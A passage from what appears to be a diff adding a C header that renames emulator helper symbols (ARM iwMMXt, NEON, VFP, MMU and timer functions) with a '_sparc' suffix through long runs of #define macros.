gen_op_iwmmxt_cmpgtub_M0_wRn_sparc +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_sparc +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_sparc +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_sparc +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_sparc +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_sparc +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_sparc +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_sparc +#define gen_op_iwmmxt_maxsl_M0_wRn 
gen_op_iwmmxt_maxsl_M0_wRn_sparc +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_sparc +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_sparc +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_sparc +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_sparc +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_sparc +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_sparc +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_sparc +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_sparc +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_sparc +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_sparc +#define gen_op_iwmmxt_movq_M0_wRn gen_op_iwmmxt_movq_M0_wRn_sparc +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_sparc +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_sparc +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_sparc +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_sparc +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_sparc +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_sparc +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_sparc +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_sparc +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_sparc +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_sparc +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_sparc +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_sparc +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_sparc +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_sparc +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_sparc +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_sparc +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_sparc +#define gen_op_iwmmxt_subnb_M0_wRn 
gen_op_iwmmxt_subnb_M0_wRn_sparc +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_sparc +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_sparc +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_sparc +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_sparc +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_sparc +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_sparc +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_sparc +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_sparc +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_sparc +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_sparc +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_sparc +#define gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_sparc +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_sparc +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_sparc +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_sparc +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_sparc +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_sparc +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_sparc +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_sparc +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_sparc +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_sparc +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_sparc +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_sparc +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_sparc +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_sparc +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_sparc +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_sparc +#define gen_rev16 gen_rev16_sparc +#define gen_revsh gen_revsh_sparc 
+#define gen_rfe gen_rfe_sparc +#define gen_sar gen_sar_sparc +#define gen_sbc_CC gen_sbc_CC_sparc +#define gen_sbfx gen_sbfx_sparc +#define gen_set_CF_bit31 gen_set_CF_bit31_sparc +#define gen_set_condexec gen_set_condexec_sparc +#define gen_set_cpsr gen_set_cpsr_sparc +#define gen_set_label gen_set_label_sparc +#define gen_set_pc_im gen_set_pc_im_sparc +#define gen_set_psr gen_set_psr_sparc +#define gen_set_psr_im gen_set_psr_im_sparc +#define gen_shl gen_shl_sparc +#define gen_shr gen_shr_sparc +#define gen_smc gen_smc_sparc +#define gen_smul_dual gen_smul_dual_sparc +#define gen_srs gen_srs_sparc +#define gen_ss_advance gen_ss_advance_sparc +#define gen_step_complete_exception gen_step_complete_exception_sparc +#define gen_store_exclusive gen_store_exclusive_sparc +#define gen_storeq_reg gen_storeq_reg_sparc +#define gen_sub_carry gen_sub_carry_sparc +#define gen_sub_CC gen_sub_CC_sparc +#define gen_subq_msw gen_subq_msw_sparc +#define gen_swap_half gen_swap_half_sparc +#define gen_thumb2_data_op gen_thumb2_data_op_sparc +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_sparc +#define gen_ubfx gen_ubfx_sparc +#define gen_vfp_abs gen_vfp_abs_sparc +#define gen_vfp_add gen_vfp_add_sparc +#define gen_vfp_cmp gen_vfp_cmp_sparc +#define gen_vfp_cmpe gen_vfp_cmpe_sparc +#define gen_vfp_div gen_vfp_div_sparc +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_sparc +#define gen_vfp_F1_mul gen_vfp_F1_mul_sparc +#define gen_vfp_F1_neg gen_vfp_F1_neg_sparc +#define gen_vfp_ld gen_vfp_ld_sparc +#define gen_vfp_mrs gen_vfp_mrs_sparc +#define gen_vfp_msr gen_vfp_msr_sparc +#define gen_vfp_mul gen_vfp_mul_sparc +#define gen_vfp_neg gen_vfp_neg_sparc +#define gen_vfp_shto gen_vfp_shto_sparc +#define gen_vfp_sito gen_vfp_sito_sparc +#define gen_vfp_slto gen_vfp_slto_sparc +#define gen_vfp_sqrt gen_vfp_sqrt_sparc +#define gen_vfp_st gen_vfp_st_sparc +#define gen_vfp_sub gen_vfp_sub_sparc +#define gen_vfp_tosh gen_vfp_tosh_sparc +#define gen_vfp_tosi gen_vfp_tosi_sparc +#define 
gen_vfp_tosiz gen_vfp_tosiz_sparc +#define gen_vfp_tosl gen_vfp_tosl_sparc +#define gen_vfp_touh gen_vfp_touh_sparc +#define gen_vfp_toui gen_vfp_toui_sparc +#define gen_vfp_touiz gen_vfp_touiz_sparc +#define gen_vfp_toul gen_vfp_toul_sparc +#define gen_vfp_uhto gen_vfp_uhto_sparc +#define gen_vfp_uito gen_vfp_uito_sparc +#define gen_vfp_ulto gen_vfp_ulto_sparc +#define get_arm_cp_reginfo get_arm_cp_reginfo_sparc +#define get_clock get_clock_sparc +#define get_clock_realtime get_clock_realtime_sparc +#define get_constraint_priority get_constraint_priority_sparc +#define get_float_exception_flags get_float_exception_flags_sparc +#define get_float_rounding_mode get_float_rounding_mode_sparc +#define get_fpstatus_ptr get_fpstatus_ptr_sparc +#define get_level1_table_address get_level1_table_address_sparc +#define get_mem_index get_mem_index_sparc +#define get_next_param_value get_next_param_value_sparc +#define get_opt_name get_opt_name_sparc +#define get_opt_value get_opt_value_sparc +#define get_page_addr_code get_page_addr_code_sparc +#define get_param_value get_param_value_sparc +#define get_phys_addr get_phys_addr_sparc +#define get_phys_addr_lpae get_phys_addr_lpae_sparc +#define get_phys_addr_mpu get_phys_addr_mpu_sparc +#define get_phys_addr_v5 get_phys_addr_v5_sparc +#define get_phys_addr_v6 get_phys_addr_v6_sparc +#define get_system_memory get_system_memory_sparc +#define get_ticks_per_sec get_ticks_per_sec_sparc +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_sparc +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__sparc +#define gt_cntfrq_access gt_cntfrq_access_sparc +#define gt_cnt_read gt_cnt_read_sparc +#define gt_cnt_reset gt_cnt_reset_sparc +#define gt_counter_access gt_counter_access_sparc +#define gt_ctl_write gt_ctl_write_sparc +#define gt_cval_write gt_cval_write_sparc +#define gt_get_countervalue gt_get_countervalue_sparc +#define gt_pct_access gt_pct_access_sparc +#define gt_ptimer_access gt_ptimer_access_sparc +#define 
gt_recalc_timer gt_recalc_timer_sparc +#define gt_timer_access gt_timer_access_sparc +#define gt_tval_read gt_tval_read_sparc +#define gt_tval_write gt_tval_write_sparc +#define gt_vct_access gt_vct_access_sparc +#define gt_vtimer_access gt_vtimer_access_sparc +#define guest_phys_blocks_free guest_phys_blocks_free_sparc +#define guest_phys_blocks_init guest_phys_blocks_init_sparc +#define handle_vcvt handle_vcvt_sparc +#define handle_vminmaxnm handle_vminmaxnm_sparc +#define handle_vrint handle_vrint_sparc +#define handle_vsel handle_vsel_sparc +#define has_help_option has_help_option_sparc +#define have_bmi1 have_bmi1_sparc +#define have_bmi2 have_bmi2_sparc +#define hcr_write hcr_write_sparc +#define helper_access_check_cp_reg helper_access_check_cp_reg_sparc +#define helper_add_saturate helper_add_saturate_sparc +#define helper_add_setq helper_add_setq_sparc +#define helper_add_usaturate helper_add_usaturate_sparc +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_sparc +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_sparc +#define helper_be_ldq_mmu helper_be_ldq_mmu_sparc +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_sparc +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_sparc +#define helper_be_ldul_mmu helper_be_ldul_mmu_sparc +#define helper_be_lduw_mmu helper_be_lduw_mmu_sparc +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_sparc +#define helper_be_stl_mmu helper_be_stl_mmu_sparc +#define helper_be_stq_mmu helper_be_stq_mmu_sparc +#define helper_be_stw_mmu helper_be_stw_mmu_sparc +#define helper_clear_pstate_ss helper_clear_pstate_ss_sparc +#define helper_clz_arm helper_clz_arm_sparc +#define helper_cpsr_read helper_cpsr_read_sparc +#define helper_cpsr_write helper_cpsr_write_sparc +#define helper_crc32_arm helper_crc32_arm_sparc +#define helper_crc32c helper_crc32c_sparc +#define helper_crypto_aese helper_crypto_aese_sparc +#define helper_crypto_aesmc helper_crypto_aesmc_sparc +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_sparc +#define 
helper_crypto_sha1h helper_crypto_sha1h_sparc +#define helper_crypto_sha1su1 helper_crypto_sha1su1_sparc +#define helper_crypto_sha256h helper_crypto_sha256h_sparc +#define helper_crypto_sha256h2 helper_crypto_sha256h2_sparc +#define helper_crypto_sha256su0 helper_crypto_sha256su0_sparc +#define helper_crypto_sha256su1 helper_crypto_sha256su1_sparc +#define helper_dc_zva helper_dc_zva_sparc +#define helper_double_saturate helper_double_saturate_sparc +#define helper_exception_internal helper_exception_internal_sparc +#define helper_exception_return helper_exception_return_sparc +#define helper_exception_with_syndrome helper_exception_with_syndrome_sparc +#define helper_get_cp_reg helper_get_cp_reg_sparc +#define helper_get_cp_reg64 helper_get_cp_reg64_sparc +#define helper_get_r13_banked helper_get_r13_banked_sparc +#define helper_get_user_reg helper_get_user_reg_sparc +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_sparc +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_sparc +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_sparc +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_sparc +#define helper_iwmmxt_addnl helper_iwmmxt_addnl_sparc +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_sparc +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_sparc +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_sparc +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_sparc +#define helper_iwmmxt_addub helper_iwmmxt_addub_sparc +#define helper_iwmmxt_addul helper_iwmmxt_addul_sparc +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_sparc +#define helper_iwmmxt_align helper_iwmmxt_align_sparc +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_sparc +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_sparc +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_sparc +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_sparc +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_sparc +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_sparc +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_sparc +#define 
helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_sparc +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_sparc +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_sparc +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_sparc +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_sparc +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_sparc +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_sparc +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_sparc +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_sparc +#define helper_iwmmxt_insr helper_iwmmxt_insr_sparc +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_sparc +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_sparc +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_sparc +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_sparc +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_sparc +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_sparc +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_sparc +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_sparc +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_sparc +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_sparc +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_sparc +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_sparc +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_sparc +#define helper_iwmmxt_minub helper_iwmmxt_minub_sparc +#define helper_iwmmxt_minul helper_iwmmxt_minul_sparc +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_sparc +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_sparc +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_sparc +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_sparc +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_sparc +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_sparc +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_sparc +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_sparc +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_sparc +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_sparc +#define helper_iwmmxt_mululw 
helper_iwmmxt_mululw_sparc +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_sparc +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_sparc +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_sparc +#define helper_iwmmxt_packul helper_iwmmxt_packul_sparc +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_sparc +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_sparc +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_sparc +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_sparc +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_sparc +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_sparc +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_sparc +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_sparc +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_sparc +#define helper_iwmmxt_slll helper_iwmmxt_slll_sparc +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_sparc +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_sparc +#define helper_iwmmxt_sral helper_iwmmxt_sral_sparc +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_sparc +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_sparc +#define helper_iwmmxt_srll helper_iwmmxt_srll_sparc +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_sparc +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_sparc +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_sparc +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_sparc +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_sparc +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_sparc +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_sparc +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_sparc +#define helper_iwmmxt_subub helper_iwmmxt_subub_sparc +#define helper_iwmmxt_subul helper_iwmmxt_subul_sparc +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_sparc +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_sparc +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_sparc +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_sparc +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_sparc +#define 
helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_sparc +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_sparc +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_sparc +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_sparc +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_sparc +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_sparc +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_sparc +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_sparc +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_sparc +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_sparc +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_sparc +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_sparc +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_sparc +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_sparc +#define helper_ldb_cmmu helper_ldb_cmmu_sparc +#define helper_ldb_mmu helper_ldb_mmu_sparc +#define helper_ldl_cmmu helper_ldl_cmmu_sparc +#define helper_ldl_mmu helper_ldl_mmu_sparc +#define helper_ldq_cmmu helper_ldq_cmmu_sparc +#define helper_ldq_mmu helper_ldq_mmu_sparc +#define helper_ldw_cmmu helper_ldw_cmmu_sparc +#define helper_ldw_mmu helper_ldw_mmu_sparc +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_sparc +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_sparc +#define helper_le_ldq_mmu helper_le_ldq_mmu_sparc +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_sparc +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_sparc +#define helper_le_ldul_mmu helper_le_ldul_mmu_sparc +#define helper_le_lduw_mmu helper_le_lduw_mmu_sparc +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_sparc +#define helper_le_stl_mmu helper_le_stl_mmu_sparc +#define helper_le_stq_mmu helper_le_stq_mmu_sparc +#define helper_le_stw_mmu helper_le_stw_mmu_sparc +#define helper_msr_i_pstate helper_msr_i_pstate_sparc +#define helper_neon_abd_f32 helper_neon_abd_f32_sparc +#define helper_neon_abdl_s16 helper_neon_abdl_s16_sparc +#define 
helper_neon_abdl_s32 helper_neon_abdl_s32_sparc +#define helper_neon_abdl_s64 helper_neon_abdl_s64_sparc +#define helper_neon_abdl_u16 helper_neon_abdl_u16_sparc +#define helper_neon_abdl_u32 helper_neon_abdl_u32_sparc +#define helper_neon_abdl_u64 helper_neon_abdl_u64_sparc +#define helper_neon_abd_s16 helper_neon_abd_s16_sparc +#define helper_neon_abd_s32 helper_neon_abd_s32_sparc +#define helper_neon_abd_s8 helper_neon_abd_s8_sparc +#define helper_neon_abd_u16 helper_neon_abd_u16_sparc +#define helper_neon_abd_u32 helper_neon_abd_u32_sparc +#define helper_neon_abd_u8 helper_neon_abd_u8_sparc +#define helper_neon_abs_s16 helper_neon_abs_s16_sparc +#define helper_neon_abs_s8 helper_neon_abs_s8_sparc +#define helper_neon_acge_f32 helper_neon_acge_f32_sparc +#define helper_neon_acge_f64 helper_neon_acge_f64_sparc +#define helper_neon_acgt_f32 helper_neon_acgt_f32_sparc +#define helper_neon_acgt_f64 helper_neon_acgt_f64_sparc +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_sparc +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_sparc +#define helper_neon_addl_u16 helper_neon_addl_u16_sparc +#define helper_neon_addl_u32 helper_neon_addl_u32_sparc +#define helper_neon_add_u16 helper_neon_add_u16_sparc +#define helper_neon_add_u8 helper_neon_add_u8_sparc +#define helper_neon_ceq_f32 helper_neon_ceq_f32_sparc +#define helper_neon_ceq_u16 helper_neon_ceq_u16_sparc +#define helper_neon_ceq_u32 helper_neon_ceq_u32_sparc +#define helper_neon_ceq_u8 helper_neon_ceq_u8_sparc +#define helper_neon_cge_f32 helper_neon_cge_f32_sparc +#define helper_neon_cge_s16 helper_neon_cge_s16_sparc +#define helper_neon_cge_s32 helper_neon_cge_s32_sparc +#define helper_neon_cge_s8 helper_neon_cge_s8_sparc +#define helper_neon_cge_u16 helper_neon_cge_u16_sparc +#define helper_neon_cge_u32 helper_neon_cge_u32_sparc +#define helper_neon_cge_u8 helper_neon_cge_u8_sparc +#define helper_neon_cgt_f32 helper_neon_cgt_f32_sparc +#define helper_neon_cgt_s16 
helper_neon_cgt_s16_sparc +#define helper_neon_cgt_s32 helper_neon_cgt_s32_sparc +#define helper_neon_cgt_s8 helper_neon_cgt_s8_sparc +#define helper_neon_cgt_u16 helper_neon_cgt_u16_sparc +#define helper_neon_cgt_u32 helper_neon_cgt_u32_sparc +#define helper_neon_cgt_u8 helper_neon_cgt_u8_sparc +#define helper_neon_cls_s16 helper_neon_cls_s16_sparc +#define helper_neon_cls_s32 helper_neon_cls_s32_sparc +#define helper_neon_cls_s8 helper_neon_cls_s8_sparc +#define helper_neon_clz_u16 helper_neon_clz_u16_sparc +#define helper_neon_clz_u8 helper_neon_clz_u8_sparc +#define helper_neon_cnt_u8 helper_neon_cnt_u8_sparc +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_sparc +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_sparc +#define helper_neon_hadd_s16 helper_neon_hadd_s16_sparc +#define helper_neon_hadd_s32 helper_neon_hadd_s32_sparc +#define helper_neon_hadd_s8 helper_neon_hadd_s8_sparc +#define helper_neon_hadd_u16 helper_neon_hadd_u16_sparc +#define helper_neon_hadd_u32 helper_neon_hadd_u32_sparc +#define helper_neon_hadd_u8 helper_neon_hadd_u8_sparc +#define helper_neon_hsub_s16 helper_neon_hsub_s16_sparc +#define helper_neon_hsub_s32 helper_neon_hsub_s32_sparc +#define helper_neon_hsub_s8 helper_neon_hsub_s8_sparc +#define helper_neon_hsub_u16 helper_neon_hsub_u16_sparc +#define helper_neon_hsub_u32 helper_neon_hsub_u32_sparc +#define helper_neon_hsub_u8 helper_neon_hsub_u8_sparc +#define helper_neon_max_s16 helper_neon_max_s16_sparc +#define helper_neon_max_s32 helper_neon_max_s32_sparc +#define helper_neon_max_s8 helper_neon_max_s8_sparc +#define helper_neon_max_u16 helper_neon_max_u16_sparc +#define helper_neon_max_u32 helper_neon_max_u32_sparc +#define helper_neon_max_u8 helper_neon_max_u8_sparc +#define helper_neon_min_s16 helper_neon_min_s16_sparc +#define helper_neon_min_s32 helper_neon_min_s32_sparc +#define helper_neon_min_s8 helper_neon_min_s8_sparc +#define helper_neon_min_u16 helper_neon_min_u16_sparc +#define 
helper_neon_min_u32 helper_neon_min_u32_sparc +#define helper_neon_min_u8 helper_neon_min_u8_sparc +#define helper_neon_mull_p8 helper_neon_mull_p8_sparc +#define helper_neon_mull_s16 helper_neon_mull_s16_sparc +#define helper_neon_mull_s8 helper_neon_mull_s8_sparc +#define helper_neon_mull_u16 helper_neon_mull_u16_sparc +#define helper_neon_mull_u8 helper_neon_mull_u8_sparc +#define helper_neon_mul_p8 helper_neon_mul_p8_sparc +#define helper_neon_mul_u16 helper_neon_mul_u16_sparc +#define helper_neon_mul_u8 helper_neon_mul_u8_sparc +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_sparc +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_sparc +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_sparc +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_sparc +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_sparc +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_sparc +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_sparc +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_sparc +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_sparc +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_sparc +#define helper_neon_narrow_u16 helper_neon_narrow_u16_sparc +#define helper_neon_narrow_u8 helper_neon_narrow_u8_sparc +#define helper_neon_negl_u16 helper_neon_negl_u16_sparc +#define helper_neon_negl_u32 helper_neon_negl_u32_sparc +#define helper_neon_paddl_u16 helper_neon_paddl_u16_sparc +#define helper_neon_paddl_u32 helper_neon_paddl_u32_sparc +#define helper_neon_padd_u16 helper_neon_padd_u16_sparc +#define helper_neon_padd_u8 helper_neon_padd_u8_sparc +#define helper_neon_pmax_s16 helper_neon_pmax_s16_sparc +#define helper_neon_pmax_s8 helper_neon_pmax_s8_sparc +#define helper_neon_pmax_u16 helper_neon_pmax_u16_sparc +#define helper_neon_pmax_u8 helper_neon_pmax_u8_sparc +#define helper_neon_pmin_s16 helper_neon_pmin_s16_sparc 
